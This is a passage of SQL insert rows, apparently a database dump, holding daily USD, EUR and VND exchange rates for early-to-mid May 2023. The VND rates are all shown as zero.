(3486, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3487, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3488, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3489, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3490, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3491, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3492, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3493, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3494, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3495, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3496, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3497, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3498, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3499, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3500, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3501, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3502, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3503, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3504, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3505, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3506, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3507, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3508, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3509, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3510, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3511, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3512, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3513, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3514, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3515, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3516, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3517, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3518, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3519, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3520, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3521, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3522, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3523, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3524, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3525, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3526, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3527, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3528, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3529, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3530, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3531, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3532, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3533, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3534, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3535, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3536, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3537, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3538, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3539, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3540, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3541, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3542, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3543, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3544, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3545, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3546, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3547, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3548, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3549, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3550, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3551, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3552, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3553, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-07'),
(3554, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3555, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-07'),
(3556, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-07'),
(3557, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-07'),
(3558, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-07'),
(3559, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3560, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3561, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3562, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3563, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3564, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3565, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3566, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3567, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3568, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3569, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3570, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3571, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3572, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3573, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3574, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3575, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3576, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3577, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3578, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3579, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3580, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3581, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3582, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3583, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3584, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3585, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3586, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3587, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3588, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3589, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3590, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3591, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3592, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3593, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3594, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3595, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-08'),
(3596, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3597, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-08'),
(3598, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3599, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3600, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3601, 1, 'USD', 0.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3602, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3603, 2, 'EUR', 0.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3604, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-08'),
(3605, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-08'),
(3606, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-08'),
(3607, 1, 'USD', 1.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3608, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3609, 2, 'EUR', 1.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3610, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3611, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3612, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3613, 1, 'USD', 0.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3614, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3615, 2, 'EUR', 0.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3616, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3617, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3618, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3619, 1, 'USD', 1.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3620, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3621, 2, 'EUR', 1.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3622, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3623, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3624, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3625, 1, 'USD', 0.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3626, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3627, 2, 'EUR', 0.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3628, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3629, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3630, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3631, 1, 'USD', 1.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3632, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3633, 2, 'EUR', 1.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3634, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3635, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3636, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3637, 1, 'USD', 0.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3638, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3639, 2, 'EUR', 0.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3640, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3641, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3642, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3643, 1, 'USD', 1.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3644, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3645, 2, 'EUR', 1.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3646, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3647, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3648, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3649, 1, 'USD', 0.000000, 2, 'EUR', 0.906040, '2023-05-09'),
(3650, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3651, 2, 'EUR', 0.000000, 1, 'USD', 1.103700, '2023-05-09'),
(3652, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-09'),
(3653, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-09'),
(3654, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-09'),
(3655, 1, 'USD', 1.000000, 2, 'EUR', 0.906040, '2023-05-10'),
(3656, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3657, 2, 'EUR', 1.000000, 1, 'USD', 1.103700, '2023-05-10'),
(3658, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3659, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3660, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3661, 1, 'USD', 0.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3662, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3663, 2, 'EUR', 0.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3664, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3665, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3666, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3667, 1, 'USD', 1.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3668, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3669, 2, 'EUR', 1.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3670, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3671, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3672, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3673, 1, 'USD', 0.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3674, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3675, 2, 'EUR', 0.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3676, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3677, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3678, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3679, 1, 'USD', 1.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3680, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3681, 2, 'EUR', 1.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3682, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3683, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3684, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3685, 1, 'USD', 0.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3686, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3687, 2, 'EUR', 0.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3688, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3689, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3690, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3691, 1, 'USD', 1.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3692, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3693, 2, 'EUR', 1.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3694, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3695, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3696, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3697, 1, 'USD', 0.000000, 2, 'EUR', 0.912490, '2023-05-10'),
(3698, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3699, 2, 'EUR', 0.000000, 1, 'USD', 1.095900, '2023-05-10'),
(3700, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-10'),
(3701, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-10'),
(3702, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-10'),
(3703, 1, 'USD', 1.000000, 2, 'EUR', 0.912490, '2023-05-11'),
(3704, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3705, 2, 'EUR', 1.000000, 1, 'USD', 1.095900, '2023-05-11'),
(3706, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3707, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3708, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3709, 1, 'USD', 0.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3710, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3711, 2, 'EUR', 0.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3712, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3713, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3714, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3715, 1, 'USD', 1.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3716, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3717, 2, 'EUR', 1.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3718, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3719, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3720, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3721, 1, 'USD', 0.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3722, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3723, 2, 'EUR', 0.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3724, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3725, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3726, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3727, 1, 'USD', 1.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3728, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3729, 2, 'EUR', 1.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3730, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3731, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3732, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3733, 1, 'USD', 0.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3734, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3735, 2, 'EUR', 0.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3736, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3737, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3738, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3739, 1, 'USD', 1.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3740, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3741, 2, 'EUR', 1.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3742, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3743, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3744, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3745, 1, 'USD', 0.000000, 2, 'EUR', 0.913240, '2023-05-11'),
(3746, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3747, 2, 'EUR', 0.000000, 1, 'USD', 1.095000, '2023-05-11'),
(3748, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-11'),
(3749, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-11'),
(3750, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-11'),
(3751, 1, 'USD', 1.000000, 2, 'EUR', 0.913240, '2023-05-12'),
(3752, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3753, 2, 'EUR', 1.000000, 1, 'USD', 1.095000, '2023-05-12'),
(3754, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3755, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3756, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3757, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3758, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3759, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3760, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3761, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3762, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3763, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3764, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3765, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3766, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3767, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3768, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3769, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3770, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3771, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3772, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3773, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3774, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3775, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3776, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3777, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3778, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3779, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3780, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3781, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3782, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3783, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3784, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3785, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3786, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3787, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3788, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3789, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3790, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3791, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3792, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3793, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-05-12'),
(3794, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3795, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-05-12'),
(3796, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-12'),
(3797, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-12'),
(3798, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-12'),
(3799, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-05-13'),
(3800, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3801, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-05-13'),
(3802, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3803, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3804, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3805, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3806, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3807, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3808, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3809, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3810, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3811, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3812, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3813, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3814, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3815, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3816, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3817, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3818, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3819, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3820, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3821, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3822, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3823, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3824, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3825, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3826, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3827, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3828, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3829, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3830, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3831, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3832, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3833, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3834, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3835, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3836, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
